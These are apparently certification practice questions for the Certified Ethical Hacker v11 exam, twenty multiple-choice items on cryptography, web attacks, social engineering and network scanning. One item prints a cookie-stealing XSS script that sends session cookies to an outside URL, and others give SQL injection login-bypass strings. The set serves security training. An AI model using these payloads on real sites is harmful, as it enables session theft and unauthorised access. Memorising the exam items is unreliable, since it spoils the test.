312-50v11 : Certified Ethical Hacker v11 Exam : Part 10

  1. This form of encryption algorithm is a symmetric key block cipher that is characterized by a 128-bit block size, and its key size can be up to 256 bits. Which among the following is this encryption algorithm?

    • HMAC encryption algorithm
    • Twofish encryption algorithm
    • IDEA
    • Blowfish encryption algorithm
  2. Ethical hacker Jane Smith is attempting to perform an SQL injection attack. She wants to test the response time of a true or false response and wants to use a second command to determine whether the database will return true or false results for user IDs.

    Which two SQL injection types would give her the results she is looking for?

    • Out of band and boolean-based
    • Union-based and error-based
    • Time-based and union-based
    • Time-based and boolean-based
  3. Judy created a forum. One day, she discovers that a user is posting strange images without writing comments. She immediately calls a security expert, who discovers that the following code is hidden behind those images:

    <script>
    document.write('<img src="https://localhost/submitcookie.php?cookie=' + escape(document.cookie) + '" />');
    </script>

    What issue occurred for the users who clicked on the image?

    • This php file silently executes the code and grabs the user’s session cookie and session ID.
    • The code redirects the user to another site.
    • The code injects a new cookie to the browser.
    • The code is a virus that is attempting to gather the user’s username and password.
  4. Suppose that you test an application for the SQL injection vulnerability. You know that the backend database is based on Microsoft SQL Server. In the login/password form, you enter the following credentials:

    Username: attack' or 1=1 --
    Password: 123456

    Based on the above credentials, which of the following SQL commands are you expecting to be executed by the server, if there is indeed an SQL injection vulnerability?

    • select * from Users where UserName = 'attack' ' or 1=1 -- and UserPassword = '123456'
    • select * from Users where UserName = 'attack' or 1=1 -- and UserPassword = '123456'
    • select * from Users where UserName = 'attack or 1=1 -- and UserPassword = '123456'
    • select * from Users where UserName = 'attack' or 1=1 --' and UserPassword = '123456'
  5. A friend of yours tells you that he downloaded and executed a file that was sent to him by a coworker. Since the file did nothing when executed, he asks you for help because he suspects that he may have installed a trojan on his computer.

    What tests would you perform to determine whether his computer is infected?

    • Upload the file to VirusTotal.
    • You do not check; rather, you immediately restore a previous snapshot of the operating system.
    • Use ExifTool and check for malicious content.
    • Use netstat and check for outgoing connections to strange IP addresses or domains.
  6. An attacker redirects the victim to malicious websites by sending them a malicious link by email. The link appears authentic but redirects the victim to a malicious web page, which allows the attacker to steal the victim’s data. What type of attack is this?

    • Vishing
    • Phishing
    • DDoS
    • Spoofing
  7. A DDoS attack is performed at layer 7 to take down web infrastructure. Partial HTTP requests are sent to the web infrastructure or applications. Upon receiving a partial request, the target server opens multiple connections and keeps waiting for the requests to complete.

    Which attack is being described here?

    • Desynchronization
    • Slowloris attack
    • Session splicing
    • Phlashing
  8. Boney, a professional hacker, targets an organization for financial benefits. He performs an attack by sending his session ID using an MITM attack technique. Boney first obtains a valid session ID by logging into a service and later feeds the same session ID to the target employee. The session ID links the target employee to Boney’s account page without disclosing any information to the victim. When the target employee clicks on the link, all the sensitive payment details entered in a form are linked to Boney’s account.

    What is the attack performed by Boney in the above scenario?

    • Forbidden attack
    • CRIME attack
    • Session donation attack
    • Session fixation attack
  9. Gilbert, a web developer, uses a centralized web API to reduce complexity and increase the integrity of updating and changing data. For this purpose, he uses a web service that uses HTTP methods such as PUT, POST, GET, and DELETE and can improve the overall performance, visibility, scalability, reliability, and portability of an application.

    What is the type of web-service API mentioned in the above scenario?

    • RESTful API
    • JSON-RPC
    • SOAP API
    • REST API
  10. Daniel is a professional hacker who is attempting to perform an SQL injection attack on a target website, www.moviescope.com. During this process, he encountered an IDS that detects SQL injection attempts based on predefined signatures. To evade any comparison statement, he attempted placing characters such as "' or '1'='1'" in any basic injection statement such as "or 1=1."

    Identify the evasion technique used by Daniel in the above scenario.

    • Char encoding
    • IP fragmentation
    • Variation
    • Null byte
  11. Jane, an ethical hacker, is testing a target organization’s web server and website to identify security loopholes. In this process, she copied the entire website and its content on a local drive to view the complete profile of the site’s directory structure, file structure, external links, images, web pages, and so on. This information helps Jane map the website’s directories and gain valuable information.

    What is the attack technique employed by Jane in the above scenario?

    • Session hijacking
    • Website mirroring
    • Website defacement
    • Web cache poisoning
  12. Steve, an attacker, created a fake profile on a social media website and sent a request to Stella. Stella was enthralled by Steve’s profile picture and the description given for his profile, and she initiated a conversation with him soon after accepting the request. After a few days, Steve started asking about her company details and eventually gathered all the essential information regarding her company.

    What is the social engineering technique Steve employed in the above scenario?

    • Baiting
    • Piggybacking
    • Diversion theft
    • Honey trap
  13. Alice needs to send a confidential document to her coworker, Bryan. Their company has public key infrastructure set up. Therefore, Alice both encrypts the message and digitally signs it. Alice uses _______________ to encrypt the message, and Bryan uses _______________ to confirm the digital signature.

    • Bryan’s public key; Bryan’s public key
    • Alice’s public key; Alice’s public key
    • Bryan’s private key; Alice’s public key
    • Bryan’s public key; Alice’s public key
  14. Samuel, a professional hacker, monitored and intercepted already established traffic between Bob and a host machine to predict Bob’s ISN. Using this ISN, Samuel sent spoofed packets with Bob’s IP address to the host machine. The host machine responded with a packet having an incremented ISN. Consequently, Bob’s connection got hung, and Samuel was able to communicate with the host machine on behalf of Bob.

    What is the type of attack performed by Samuel in the above scenario?

    • TCP/IP hijacking
    • Blind hijacking
    • UDP hijacking
    • Forbidden attack
  15. If you send a TCP ACK segment to a known closed port on a firewall but it does not respond with an RST, what do you know about the firewall you are scanning?

    • It is a non-stateful firewall.
    • There is no firewall in place.
    • It is a stateful firewall.
    • This event does not tell you anything about the firewall.
  16. Harry, a professional hacker, targets the IT infrastructure of an organization. After preparing for the attack, he attempts to enter the target network using techniques such as sending spear-phishing emails and exploiting vulnerabilities on publicly available servers. Using these techniques, he successfully deployed malware on the target system to establish an outbound connection.

    What is the APT lifecycle phase that Harry is currently executing?

    • Initial intrusion
    • Persistence
    • Cleanup
    • Preparation
  17. In the Common Vulnerability Scoring System (CVSS) v3.1 severity ratings, what range does medium vulnerability fall in?

    • 4.0-6.0
    • 3.9-6.9
    • 3.0-6.9
    • 4.0-6.9
  18. While browsing his Facebook feed, Matt sees a picture one of his friends posted with the caption, “Learn more about your friends!”, as well as a number of personal questions. Matt is suspicious and texts his friend, who confirms that he did indeed post it. With assurance that the post is legitimate, Matt responds to the questions on the post. A few days later, Matt’s bank account has been accessed, and the password has been changed.

    What most likely happened?

    • Matt inadvertently provided the answers to his security questions when responding to the post.
    • Matt inadvertently provided his password when responding to the post.
    • Matt’s computer was infected with a keylogger.
    • Matt’s bank-account login information was brute forced.
  19. Robin, an attacker, is attempting to bypass the firewalls of an organization through the DNS tunneling method in order to exfiltrate data. He is using the NSTX tool for bypassing the firewalls.

    On which of the following ports should Robin run the NSTX tool?

    • Port 50
    • Port 23
    • Port 53
    • Port 80
  20. What is the file that determines the basic configuration (specifically activities, services, broadcast receivers, etc.) in an Android application?

    • AndroidManifest.xml
    • classes.dex
    • APK.info
    • resources.asrc